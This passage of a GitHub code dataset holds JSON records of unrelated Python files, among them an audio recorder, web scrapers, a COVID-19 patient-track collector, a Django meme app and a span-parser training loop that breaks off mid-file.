DEFAULT_WAVE_OUTPUT_FILENAME = settings.APP_USER_VOCAL_FILE\n\n def __init__(self, is_verbose=True):\n self.audio = pyaudio.PyAudio()\n self.is_verbose = is_verbose\n self.energy_threshold = 3500 # minimum audio energy to consider for recording\n self.pause_threshold = 2 # seconds of quiet time before a phrase is considered complete\n self.quiet_duration = 1 # amount of quiet time to keep on both sides of the recording\n\n def uses_audio_stream(function):\n \"\"\"\n Decorator function that initializes the `self.audio_stream` attribute on\n an instance of `AudioInput` and then closes it afterwards.\n \"\"\"\n def wrapper(self, *args, **kwargs):\n self.audio_stream = self.audio.open(\n frames_per_buffer=self.CHUNK_SIZE,\n channels=self.CHANNELS,\n rate=self.SAMPLE_RATE,\n format=self.FORMAT,\n input=True)\n value = function(self, *args, **kwargs)\n self.audio_stream.stop_stream()\n self.audio_stream.close()\n self.audio_stream = None\n return value\n return wrapper\n\n @uses_audio_stream\n def calibrate_mic(self, calibration_seconds=10, top_percent_to_average=.05) -> None:\n \"\"\"\n Set the `AudioInput`'s `energy_threshold` to the average energy\n recorded during calibration.\n \"\"\"\n if self.is_verbose:\n print(f'* Calibrating microphone (for {calibration_seconds} seconds.)')\n \n # Save the audio energies over a period of time\n energies = []\n sample_width = pyaudio.get_sample_size(self.FORMAT)\n frames_per_second = frames_per_second = self.SAMPLE_RATE / self.CHUNK_SIZE\n num_frames = int(frames_per_second * calibration_seconds)\n for _ in range(0, num_frames):\n data = self.audio_stream.read(self.CHUNK_SIZE)\n energy = audioop.rms(data, sample_width)\n energies.append(energy)\n\n # Grab the highest energies as a percent of total energies\n energies = sorted(energies, reverse=True)\n top_n_population = int(len(energies) * top_percent_to_average)\n highest_energies = energies[:top_n_population]\n \n average_energy = sum(highest_energies) / len(highest_energies)\n self.energy_threshold = average_energy\n\n if self.is_verbose:\n print(f'* Finished calibration (average energy is {average_energy}).')\n \n\n @uses_audio_stream\n def listen(self, timeout=None) -> bytes:\n \"\"\"\n TODO\n \"\"\"\n # record audio data as raw samples\n frames = collections.deque()\n assert self.pause_threshold >= self.quiet_duration >= 0\n sample_width = pyaudio.get_sample_size(self.FORMAT)\n seconds_per_buffer = (self.CHUNK_SIZE + 0.0) / self.SAMPLE_RATE\n pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of quiet audio before the phrase is complete\n quiet_buffer_count = int(math.ceil(self.quiet_duration / seconds_per_buffer)) # maximum number of buffers of quiet audio to retain before and after\n elapsed_time = 0\n\n if self.is_verbose:\n print('* Listening for input...')\n\n # store audio input until the phrase starts\n while True:\n elapsed_time += seconds_per_buffer\n if timeout and elapsed_time > timeout: # handle timeout if specified\n raise TimeoutError(\"listening timed out\")\n\n buffer = self.audio_stream.read(self.CHUNK_SIZE)\n if len(buffer) == 0: break # reached end of the stream\n frames.append(buffer)\n\n # check if the audio input has stopped being quiet\n energy = audioop.rms(buffer, sample_width) # energy of the audio signal\n if energy > self.energy_threshold:\n break\n\n if len(frames) > quiet_buffer_count: # ensure we only keep the needed amount of quiet buffers\n frames.popleft()\n \n if self.is_verbose:\n print('* Recording phrase...')\n\n 
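        # A phrase is treated as finished after roughly pause_threshold
        # seconds of consecutive quiet buffers: with the defaults above,
        # pause_buffer_count = ceil(2 / (1024 / 44100)) = 87 buffers, where
        # "quiet" means energy <= 0.9 * energy_threshold.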
# read audio input until the phrase ends\n pause_count = 0\n while True:\n buffer = self.audio_stream.read(self.CHUNK_SIZE)\n if len(buffer) == 0: break # reached end of the stream\n frames.append(buffer)\n\n # check if the audio input has gone quiet for longer than the pause threshold\n energy = audioop.rms(buffer, sample_width) # energy of the audio signal\n if energy > self.energy_threshold * 0.9:\n pause_count = 0\n else:\n pause_count += 1\n if pause_count > pause_buffer_count: # end of the phrase\n break\n\n if self.is_verbose:\n print('* End of phrase.')\n\n # obtain frame data\n for i in range(quiet_buffer_count, pause_count): frames.pop() # remove extra quiet frames at the end\n frame_data = b\"\".join(list(frames))\n\n return frame_data\n\n @uses_audio_stream\n def record(self, record_seconds=DEFAULT_RECORD_SECONDS) -> bytes:\n \"\"\"\n Record audio for a pre-determined amount of time and return bytes.\n \"\"\"\n \n # Print start message\n if self.is_verbose:\n print('* Recording...')\n\n # Append bytes in the stream to a list of bytes in memory\n frame_accumulator = []\n frames_per_second = self.SAMPLE_RATE / self.CHUNK_SIZE\n num_frames = int(frames_per_second * record_seconds)\n for _ in range(0, num_frames):\n data = self.audio_stream.read(self.CHUNK_SIZE)\n frame_accumulator.append(data)\n \n # Print end message\n if self.is_verbose:\n print('* Finished recording.')\n \n # Concat all bytes in the list and return bytes\n return b''.join(frame_accumulator)\n\n def save_bytes_to_wav_file(self, bytes, filename=DEFAULT_WAVE_OUTPUT_FILENAME) -> None:\n \"\"\"\n The side-effect of this function is to save bytes to a .wav file.\n \"\"\"\n waveFile = wave.open(filename, 'wb')\n waveFile.setnchannels(self.CHANNELS)\n waveFile.setsampwidth(self.audio.get_sample_size(self.FORMAT))\n waveFile.setframerate(self.SAMPLE_RATE)\n waveFile.writeframes(bytes)\n waveFile.close()\n\n def record_and_save(\n self, \n record_seconds=DEFAULT_RECORD_SECONDS, \n filename=DEFAULT_WAVE_OUTPUT_FILENAME) -> AudioInput:\n \"\"\"\n The side-effect of this function is to record audio and save it as a .wav file.\n This function returns this object for further operations.\n \"\"\"\n bytes = self.record()\n self.save_bytes_to_wav_file(bytes, filename)\n return self\n\n def listen_and_save(\n self, \n timeout=None, \n filename=DEFAULT_WAVE_OUTPUT_FILENAME) -> AudioInput:\n \"\"\"\n The side-effect of this function is to record audio and save it as a .wav file.\n This function returns this object for further operations.\n \"\"\"\n bytes = self.listen(timeout=timeout)\n self.save_bytes_to_wav_file(bytes, filename)\n return self\n \n def shutdown(self) -> None:\n \"\"\"\n Terminate PyAudio instance to free-up system resources.\n \"\"\"\n self.audio.terminate()\n","repo_name":"dodobird181/openai-art-exhibit","sub_path":"audio/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70394821882","text":"from intcode import IntcodeVm\r\n\r\ndef get_input():\r\n with open('../data/25.txt', 'r') as f:\r\n for line in f:\r\n return list(map(int, line.split(',')))\r\n\r\nMAIN_PROGRAM = get_input()\r\n\r\ndef play_game():\r\n vm = IntcodeVm(MAIN_PROGRAM)\r\n while True:\r\n while True:\r\n try:\r\n char = next(vm.outputs)\r\n if char is None: break\r\n print(chr(char), end='')\r\n except StopIteration:\r\n return\r\n command = input('Enter command: ')\r\n for char in command + '\\n':\r\n 
vm.send(ord(char))\r\n\r\nplay_game()\r\n","repo_name":"feadoor/advent-of-code-2019","sub_path":"python/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25146279566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 20 09:39:43 2021\n\n@author: lzt68\n\"\"\"\n\n#%% read the data\nimport pandas as pd\nimport numpy as np\ndata=pd.read_csv(\"bank-full.csv\",sep=';',engine=\"python\")\n\n#%% add year\ndata['year'] = np.zeros(data.shape[0])\nyear_counter = 2008\nii = 0\nwhile ii <= data.shape[0] - 1:\n if data['month'].iloc[ii] != 'jan':\n data['year'].iloc[ii] = year_counter\n ii = ii + 1 \n else:\n year_counter = year_counter + 1\n for jj in range(ii, data.shape[0]):\n if data['month'].iloc[jj] == 'jan':\n data['year'].iloc[jj] = year_counter\n else:\n ii = jj\n break\n \n#%% add timestamp\ndata['month'].replace({\"jan\": \"01\", \"feb\": \"02\", \"mar\": \"03\",\n \"apr\": \"04\", \"may\": \"05\", \"jun\": \"06\",\n \"jul\": \"07\", \"aug\": \"08\", \"sep\": \"09\",\n \"oct\": \"10\", \"nov\": \"11\", \"dec\": \"12\"},\n inplace = True)\n\ndata['year'] = data['year'].astype(int).astype(str)\ndata['day'] = data['day'].astype(str)\n\ndata['timestamp'] = data.apply(lambda x: x['day'] + \"-\" + x['month'] + \"-\" + x['year'], axis=1)\ndata['timestamp'] = pd.to_datetime(data['timestamp'], format=\"%d-%m-%Y\")\n\n#%% match timestamp to weekday\ndata['weekday'] = data['timestamp'].dt.dayofweek\ndata.head()\n\n#%% export the data\ndata.to_csv(\"bank-full-add_timestamp.csv\", index = False)","repo_name":"lzt68/2021-DSA5101-Machine-Learning-Project","sub_path":"Data Exploration and Preprocssing/Preprocessing_Add_Year_Timestamp.py","file_name":"Preprocessing_Add_Year_Timestamp.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38094113120","text":"import scrapy\nfrom ..items import QuotesItem\n\n\nclass Spider(scrapy.Spider):\n name = \"homes\"\n pno = 60\n start_urls = [\"https://www.99acres.com/rent-property-in-bangalore-east-ffid-page-6\"]\n\n def parse(self, response):\n items = QuotesItem()\n\n all_div_houses = response.css(\"div.oldSrp\")\n for houses in all_div_houses:\n p = houses.css(\".margin\\:0::text\").extract()\n t = houses.css(\"a::text\").extract()\n l = houses.css(\".srpttl a\").xpath(\"@href\").extract()\n a = houses.css(\".topActions+ span b::text\").extract()\n s = houses.css(\".doElip b::text\").extract()\n d = houses.css(\".wBr > span::text\").extract()\n f = houses.css(\".fcInit i\").xpath(\"@value\").extract()\n\n if p != []:\n price = p[0].strip()\n else:\n price = ''\n\n if t != []:\n title = t[0].strip()\n else:\n title = ''\n\n if a != []:\n area = a[0].strip()\n else:\n area = ''\n\n if s != []:\n society = s[0].strip()\n else:\n society = ''\n\n if l != []:\n link = l[0].strip()\n else:\n link = ''\n\n features = ''\n for i in f:\n features = features + i + \", \"\n features = features[:len(features) - 2]\n\n description = ''\n for i in d:\n if i != '... 
':\n description += i\n\n items[\"price\"] = price\n items[\"title\"] = title\n items[\"link\"] = link\n items[\"area\"] = area\n items[\"society\"] = society\n items[\"description\"] = description\n items[\"features\"] = features\n\n yield items\n\n next_page = \"https://www.99acres.com/rent-property-in-bangalore-east-ffid-page-\"+str(Spider.pno)\n if Spider.pno <= 262:\n Spider.pno += 1\n yield response.follow(next_page, callback = self.parse)","repo_name":"JerinFrancisA/Scrapy-99acres","sub_path":"Quotes/spiders/homes.py","file_name":"homes.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37492317080","text":"import re\nfrom zenrows import ZenRowsClient\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\nimport nltk\nfrom nltk import word_tokenize, pos_tag\nfrom collections import Counter\nimport csv\n\n# Download NLTK data (if not already downloaded)\nnltk.download(\"punkt\")\nnltk.download(\"averaged_perceptron_tagger\")\n\n# Initialize the ZenRowsClient with your API key and parameters\n# IMPORTANT! Obtain API KEY here (https://app.zenrows.com/)\nzenrows_client = ZenRowsClient(\"API_KEY\")\n\n# Define the URL of the webpage to scrape using ZenRows\nbase_url = \"https://bestcompany.com/health-insurance/company/oscar?page={page}#reviews\"\n\n# Define parameters for ZenRows request\nparams = {\"autoparse\": \"true\"}\n\n# Define the number of pages to scrape\nnum_pages = 15 # Change this to the desired number of pages\n\n# Create an empty list to store all adjectives across all pages\nall_adjectives = []\n\n# Iterate through the specified number of pages\nfor page_number in range(1, num_pages + 1):\n # Construct the full URL for the current page\n current_url = base_url.format(page=page_number)\n\n # Use ZenRows to fetch the webpage content with autoparsing\n zenrows_response = zenrows_client.get(current_url, params=params)\n\n # Check if ZenRows response contains text content\n if not zenrows_response.text:\n # No more pages or error occurred, exit the loop\n break\n\n # Get the webpage content from ZenRows response\n webpage_content = zenrows_response.text\n\n # Remove symbols and punctuation\n webpage_content = re.sub(r'[^\\w\\s]', '', webpage_content)\n\n # Tokenize the cleaned text into words\n words = word_tokenize(webpage_content)\n\n # Perform part-of-speech tagging to identify adjectives\n tagged_words = pos_tag(words)\n\n # Define a list of generic adjectives to exclude\n exclude_adjectives = [\"much\", \"type\", \"url\", \"next\", \"great\", \"good\", \"many\", \"sure\", \"same\", \"different\", \"able\", \"other\", \"itemreviewed\", \"ratingvalue\", \"medical\"]\n\n # Filter only adjectives (JJ) from the tagged words and exclude generic adjectives\n adjectives = [word for word, tag in tagged_words if tag == \"JJ\" and word.lower() not in exclude_adjectives]\n\n # Append the adjectives from the current page to the list\n all_adjectives.extend(adjectives)\n\n# Create a word frequency count of adjectives across all pages\nadjective_counts = Counter(all_adjectives)\n\n# Get the top 100 adjectives with their frequencies\ntop_100_adjectives = adjective_counts.most_common(100)\n\n# Create a WordCloud with frequencies\nwordcloud = WordCloud(\n width=800,\n height=400,\n background_color=\"white\",\n # Pass the dictionary of word frequencies as input\n prefer_horizontal=1.0, # Controls the direction of 
words\n)\nwordcloud.generate_from_frequencies(dict(top_100_adjectives)) # Use word frequencies\n\n# Display the WordCloud\nplt.figure(figsize=(10, 5))\nplt.imshow(wordcloud, interpolation=\"bilinear\")\nplt.axis(\"off\")\nplt.title(\"Oscar Health's Top 100\")\nplt.show()\n\n# Export top 100 words and their frequencies to a CSV file\nwith open(\"top_100_adjectives.csv\", \"w\", newline=\"\") as csvfile:\n csv_writer = csv.writer(csvfile)\n csv_writer.writerow([\"Word\", \"Frequency\"])\n for word, frequency in top_100_adjectives:\n csv_writer.writerow([word, frequency])\n\n\n","repo_name":"chrischang0726/demo-repo","sub_path":"oscar_health_customercomments.py","file_name":"oscar_health_customercomments.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74023152119","text":"\"\"\" Utility to load public keys (PEM) into redis for use with the cactuscoinapi.\n\"\"\"\nimport sys\nimport argparse\nimport logging\nimport redis\nimport pathlib\n\nLOGGING_FORMAT = \"%(message)s\"\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n\n p = argparse.ArgumentParser(description=__doc__)\n p.add_argument(\"--redis-server\", '-H', default='localhost', help='Redis server to connect to.')\n p.add_argument(\"--redis-port\", '-p', default=6379, help='Port to use with redis server.')\n p.add_argument(\"pubkeyfile\", nargs=\"+\", help='')\n\n args = p.parse_args(argv)\n fmt = LOGGING_FORMAT\n\n \"\"\"\n if args.verbose == 1:\n logging.basicConfig(level=logging.INFO, format=fmt)\n elif args.verbose == 2:\n logging.basicConfig(level=logging.DEBUG, format=fmt)\n else:\n logging.basicConfig(level=logging.WARNING, format=fmt)\n \"\"\"\n\n logger = logging.getLogger()\n\n r = redis.Redis(host=args.redis_server, port=args.redis_port)\n \n for keyfilepath in args.pubkeyfile:\n badge_num = int(pathlib.Path(keyfilepath).name)\n with open(keyfilepath, 'r') as key_file:\n r.hset('badge_keys', badge_num, key_file.read())\n\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n","repo_name":"erikwilson/CactusCon7","sub_path":"badge/api/utils/load_keys.py","file_name":"load_keys.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"15955507268","text":"#coding:utf-8\n\n\nfrom\tDBTools\timport\tDBTools\n\n\n\n\n\n\n#### --- Получение списка цен ---\ndef GetListCost(mate_kod):\n db = DBTools()\n cr=db.cnx.cursor()\n cr.execute(\"SELECT * FROM mr_show_cost WHERE mate_kod=%s;\" % (mate_kod))\n db.cnx.commit()\n result = cr.fetchall()\n cr.close()\n db.Destroy()\n return result\n\n\n\n\n\n\n#### --- Добавление цены ---\ndef NewCostMate(db,mate_kod,date,cost):\n cost = cost.encode(\"utf-8\")\n cr=db.cnx.cursor()\n cr.execute(\"SELECT mr_AddNewCost(%s,'%s',%s)\" % (mate_kod,date,cost))\n db.cnx.commit()\n result = cr.fetchone()\n cr.close()\n return result[0]\n\n\n\n\n\n\n#### --- Удаление цены ---\ndef DelCostMate(cost_kod):\n db = DBTools()\n cr=db.cnx.cursor()\n cr.execute(\"SELECT mr_DelCost('%s')\" % (cost_kod))\n db.cnx.commit()\n result = cr.fetchone()\n cr.close()\n db.Destroy()\n return result[0]\n","repo_name":"v-komarov/psv3","sub_path":"mr/RunSQLPage3.py","file_name":"RunSQLPage3.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41660517809","text":"#coding='utf-8'\nfrom time import 
sleep\nfrom selenium import webdriver\n\nfrom testpage import addtree\n\n#定义浏览器\n# driver=webdriver.Chrome()\n# #打开页面\n# driver.get(\"file:///C:/Users/%E5%88%98%E6%9C%8B%E5%BC%BA/Desktop/alert.html\")\n# #定位提示弹窗按钮\n# l=driver.find_element_by_id(\"2\")\n# #点击按钮\n# l.click()\n# #等待\n# sleep(1)\n# # #操作弹窗\n# w=driver.switch_to.alert\n# #获取弹窗提示信息\n# text=w.text\n# # #打印提示信息\n# print(\"弹窗提示信息是:%s\"%text)\n# # #点击确定按钮\n# w.accept()\n# sleep(1)\n# #关闭\n# driver.quit()\n\n#定义浏览器,并打开页面\ndriver=addtree.getDriver(addtree.baidu)\n#定位提示弹窗按钮\nl=driver.find_element_by_id(\"2\")\n#点击按钮\nl.click()\n#等待\nsleep(1)\n# #操作弹窗\nw=driver.switch_to.alert\n#获取弹窗提示信息\ntext=w.text\n# #打印提示信息\nprint(\"弹窗提示信息是:%s\"%text)\n# #点击确定按钮\nw.accept()\nsleep(1)\n#获取浏览器信息\nhello=driver.find_element_by_css_selector(\"[align='center']>h4\")\nprint(\"浏览器页面信息:%s\"%hello.text)\n\n#关闭\ndriver.quit()\n","repo_name":"Jinghua123456/yueying","sub_path":"webAutoProject/testpage/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16780498081","text":"#coding:utf-8\nimport requests\nimport pymongo\nimport time\nimport json\nimport random\nimport pandas as pd\n\n# 伪装请求头\nheaders = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',\n 'referer': 'https://news.qq.com/zt2020/page/feiyan.htm?from=timeline&isappinstalled=0'\n}\nrequests.packages.urllib3.disable_warnings()\n\n\nclass MongoDBPipeline(object):\n\n def __init__(self):\n self.clinet = pymongo.MongoClient(\"localhost\", 27017)\n # self.clinet = pymongo.MongoClient(\"106.12.56.213\", 27017)\n db = self.clinet[\"nCoV_pTrack\"]\n self.db = db\n\n def insert_data(self, tb_name, new_dict, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n tb.insert_one(new_dict)\n\n def insert_many(self, tb_name, new_data, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n new_dict = None\n if isinstance(new_data, list):\n new_dict = dict()\n for _data in new_data:\n new_dict[_data['_id']] = _data\n tb.insert_many(new_dict)\n\n def search(self, tb_name, search_query, fields=None, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n show_query = None\n if fields is not None:\n show_query = dict()\n for field in fields:\n show_query[field] = 1\n data = []\n for line in tb.find(search_query, show_query):\n one_data = dict()\n for key in line.keys():\n one_data[key] = line[key]\n data.append(one_data)\n return data\n\n def update_data(self, tb_name, _id, new_dict, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n tb.update_one({'_id': _id}, {'$set': new_dict})\n\n def update_many(self, tb_name, filter, new_dict, db=None):\n tb = self.db[tb_name]\n if db is not None:\n tb = self.clinet[db][tb_name]\n tb.update(filter, {'$set': new_dict}, upsert=True)\n\n\ndef query_patent_track(citycode, page, size=100):\n query_url = \"https://iflow-api.uc.cn/feiyan/track?page={}&size={}&citycode={}\".\\\n format(str(page), str(size), citycode)\n try:\n res = requests.get(query_url, verify=False, headers=headers, timeout=60000)\n obj = res.json()\n tracks = obj['data']['trackes']\n if len(tracks) < 1:\n return None\n return tracks\n except:\n print(\"error in city: %s, page: %d\" %(citycode, page))\n return None\n\n\ndef get_save_city_tracks(city, mongo, tb, df, 
size=100):\n if 'citycode' not in city:\n return\n try:\n sure_cnt = int(city['sure_cnt'])\n except:\n sure_cnt = 1000000\n for page in range(0, sure_cnt):\n tracks = query_patent_track(city['citycode'], page, size=size)\n if tracks is None:\n break\n # 保存进DataFrame (csv准备)\n for track in tracks:\n try:\n df.loc[len(df)] = track\n except:\n print(\"add to csv DataFrame error: \" + str(track))\n try:\n if 'id' in track:\n track['_id'] = track['province'] + \"-\" + track['city'] + '-' + str(track['id'])\n else:\n track['_id'] = track['province'] + \"-\" + track['city'] + '-' + str(track['index'])\n except:\n if \"id\" in track:\n track['_id'] = track[\"id\"]\n try:\n mongo.insert_data(tb, track, db=\"nCoV_pTrack\")\n except:\n print(\"insert mongo error: \" + str(track))\n # 写入mongodb\n # mongo.insert_many(tb, tracks, db=\"nCoV_pTrack\")\n time.sleep(random.randint(1, 4))\n if len(tracks) < size:\n print(\"city of %s collected...\" %city['citycode'])\n break\n\n\ndef get_one_tracker_set():\n pipeline = MongoDBPipeline()\n time_str = time.strftime(\"%m%d-%H%M\", time.localtime())\n tb_name = time_str\n csv_path = \"tracks_\" + time_str + \".csv\"\n\n pre_url = \"https://iflow-api.uc.cn/feiyan/track?page=0&size=10&city=1&citycode=340800\"\n requests.adapters.DEFAULT_RETRIES = 5\n pre_res = requests.get(pre_url, verify=False, headers=headers, timeout=60000)\n pre_json = pre_res.json()\n cities = pre_json['data']['cities']\n for city in cities:\n try:\n _id = city['one_level_area'] + \"_\" + city['two_level_area']\n city['_id'] = _id\n except:\n print(\"error in pre_processing:\" + str(city))\n # 各市疫情总体信息存储在MongoDb中\n pipeline.insert_data(\"cities\", {\"_id\": time_str, \"cities\": cities}, db=\"nCoV_pTrack\")\n df = pd.DataFrame(columns=['id', 'province', 'city', 'index', 'source',\n 'base_info', 'detail_info', 'is_from_outside'])\n # 开始抓取每个市的患者轨迹数据\n for city in cities:\n get_save_city_tracks(city, pipeline, tb_name, df, size=100)\n\n df.to_csv(csv_path, encoding='utf-8', header=True, index=False)\n print(\"save trakers ok.\")\n\n\nif __name__ == '__main__':\n for i in range(365):\n get_one_tracker_set()\n time.sleep(86190)\n","repo_name":"HgS318/nCoV2019","sub_path":"patient_tracker/patient_tracker.py","file_name":"patient_tracker.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3538916437","text":"from django.shortcuts import render, redirect\n# from django.http import Http404\nfrom django.contrib.auth import login\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import Meme, User\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\nimport uuid\nimport boto3\n\nS3_BASE_URL = 'https://s3.us-west-1.amazonaws.com/'\nBUCKET = 'memeworld'\n\n# Create your views here.\n\ndef home(request):\n\n return render(request, 'home.html')\n\n\ndef search(request):\n if str(request)[39:-2] == 'do+a+barrel+roll':\n return render(request, 'memes/barrelroll.html')\n try:\n user = User.objects.get(username=str(request)[39:-2])\n return redirect(f'/memes/user/{user.id}')\n except:\n return redirect('/memes/')\n\n\ndef memes_index(request):\n memes = Meme.objects.all()\n return render(request, 'memes/index.html', {'memes': memes})\n\n\ndef signup(request):\n error_message = ''\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if 
form.is_valid():\n user = form.save()\n login(request, user)\n return redirect('home')\n else:\n error_message = 'Invalid sign up - try again'\n form = UserCreationForm()\n context = {'form': form, 'error_message': error_message}\n return render(request, 'registration/signup.html', context)\n\n\n@login_required\ndef user_view(request):\n user = request.user\n memes = Meme.objects.filter(user=request.user)\n return render(request, 'memes/user.html', {'memes': memes, 'username': user})\n\n\ndef user_id(request, user_id):\n user = User.objects.get(id=user_id).username\n memes = Meme.objects.filter(user=user_id)\n return render(request, 'memes/user.html', {'memes': memes, 'username': user})\n\n\nclass MemeCreate(LoginRequiredMixin, CreateView):\n model = Meme\n fields = ['photo_URL', 'top_text', 'bottom_text', 'face',\n 'text_color', 'font', 'font_size', 'font_background_color']\n success_url = '/memes/user/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n photo_file = self.request.FILES.get('photo-file', None)\n if photo_file:\n s3 = boto3.client('s3')\n # need a unique \"key\" for S3 / needs image file extension too\n key = uuid.uuid4().hex[:6] + \\\n photo_file.name[photo_file.name.rfind('.'):]\n # just in case something goes wrong\n try:\n s3.upload_fileobj(photo_file, BUCKET, key)\n # build the full url string\n url = f\"{S3_BASE_URL}{BUCKET}/{key}\"\n form.instance.photo_URL = url\n except:\n print('An error occurred uploading file to S3')\n return super().form_valid(form)\n\n\nclass MemeUpdate(LoginRequiredMixin, UpdateView):\n model = Meme\n fields = ['top_text', 'bottom_text', 'face',\n 'text_color', 'font', 'font_size', 'font_background_color']\n success_url = '/memes/user/'\n\n def form_valid(self, form):\n if form.instance.user == self.request.user:\n return super().form_valid(form)\n else:\n return redirect('/memes/user/')\n\n\nclass MemeDelete(LoginRequiredMixin, DeleteView):\n model = Meme\n success_url = '/memes/user/'\n\n\n@login_required\ndef like(request, meme_id):\n meme = Meme.objects.get(id=meme_id)\n meme.likes.add(request.user.id)\n meme.save()\n return redirect(request.META.get('HTTP_REFERER', '/memes/'))\n","repo_name":"Aclap427/Meme_World","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14031379860","text":"'''\n\n 977. 
Squares of a Sorted Array\n \n'''\n\nclass Solution:\n \n '''\n\n Time Complexity:\n O(n) to iterate through all numbers\n \n Space Complexity\n O(n) to store all squared nums and result.\n \n '''\n \n def sortedSquares(self, nums):\n squared = list(map(lambda x: x*x, nums))\n \n n = len(nums)\n result = [0] * n\n curr = n - 1\n L, R = 0, n - 1\n \n while L <= R:\n if squared[L] > squared[R]:\n result[curr] = squared[L]\n L += 1\n else:\n result[curr] = squared[R]\n R -= 1\n \n curr -= 1\n \n return result\n \n \n \ndef runSolution():\n solution = Solution()\n print(solution.sortedSquares(nums = [-4,-1,0,3,10]))\n print(solution.sortedSquares(nums = [-7,-3,2,3,11]))\n pass\nrunSolution()\n","repo_name":"AlexanderDLe/Python_DataStructuresAndAlgorithms","sub_path":"Arrays&Hashing/SquaresOfASortedArray.py","file_name":"SquaresOfASortedArray.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19775148559","text":"import random\n\nimport numpy as np\nimport torch\nfrom torch.nn.utils import clip_grad_norm_\nimport torch.optim as optim\nfrom tqdm import tqdm\n\nfrom spanparser.data import create_dataset\nfrom spanparser.metadata import Metadata\nfrom spanparser.model import create_model\nfrom spanparser.utils import Stats, try_gpu\n\n\nclass Experiment(object):\n\n def __init__(self, config, outputter, load_prefix=None, seed=None):\n self.config = config\n if seed is not None:\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n self.outputter = outputter\n self.meta = Metadata(config)\n if load_prefix:\n self.load_metadata(load_prefix)\n self.dataset = create_dataset(self.config, self.meta)\n self.create_model()\n if load_prefix:\n self.load_model(load_prefix)\n else:\n self.model.initialize(self.config, self.meta)\n\n def close(self):\n pass\n\n def create_model(self):\n config = self.config\n self.model = create_model(config, self.meta)\n self.model = try_gpu(self.model)\n self.optimizer = optim.Adam(self.model.parameters(),\n lr=config.train.learning_rate,\n weight_decay=config.train.l2_reg)\n\n def load_metadata(self, prefix):\n print('Loading metadata from {}.meta'.format(prefix))\n self.meta.load(prefix + '.meta')\n\n def load_model(self, prefix):\n print('Loading model from {}.model'.format(prefix))\n state_dict = torch.load(prefix + '.model')\n self.model.load_state_dict(state_dict)\n\n ################################\n # Train loop\n\n def train(self):\n config = self.config\n max_epochs = config.timing.max_epochs\n save_every = config.timing.save_every\n eval_every = config.timing.eval_every\n\n train_stats = Stats()\n\n # Initial save\n if save_every > 0:\n self.outputter.save_model(self.meta.epoch, self.model, self.meta)\n\n progress_bar = tqdm(total=max_epochs, desc='TRAIN')\n\n while self.meta.epoch < max_epochs:\n self.meta.epoch += 1\n progress_bar.update()\n \n self.dataset.init_iter('train')\n for train_batch in tqdm(self.dataset.get_iter('train'), desc='TRAIN'):\n stats = self.process_batch(train_batch, train=True)\n train_stats.add(stats)\n print('TRAIN @ {}: {}'.format(self.meta.epoch, train_stats))\n train_stats.log(self.outputter.tb_logger, self.meta.epoch, 'pn_train_')\n train_stats = Stats()\n\n if save_every > 0 and self.meta.epoch % save_every == 0:\n # Save the model\n self.outputter.save_model(self.meta.epoch, self.model, self.meta)\n\n if self.meta.epoch % eval_every == 0:\n # Evaluate\n dev_stats = Stats()\n 
